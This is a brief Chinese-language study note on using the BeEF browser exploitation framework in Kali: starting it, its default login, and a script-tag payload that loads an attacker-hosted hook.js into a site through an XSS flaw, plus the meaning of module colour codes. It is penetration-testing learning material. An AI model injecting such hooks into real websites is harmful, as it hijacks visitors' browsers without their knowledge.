【笔记】Beef XSS Framework学习笔记
前言
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.(官网)
启动Beef
手动启动
- 首次启动需要修改默认的用户名和密码
1 | cd /usr/share/beef-xss |
通过Kali自带的脚本启动
1 | sudo beef-xss |
手动修改用户名和密码
- 修改配置文件20行和21行
1 | beef: |
登录Beef后台
Username:
beef
Password:beef(默认密码)

XSS漏洞利用(钩子)
- 使用XSS漏洞将恶意代码写入到网站
<ip>:受害者视角中攻击者的ip地址
1 | <script src="http://<ip>:3000/hook.js"></script> |
示例地址
Beef提供的用于xss测试的页面
完成
- 截图纪念

绿色标记:可以执行脚本,脚本执行后不会被发现
橙色标记:可以执行脚本,脚本执行后会被发现
灰色标记:不清楚是否可以执行脚本
红色标记:不可以执行脚本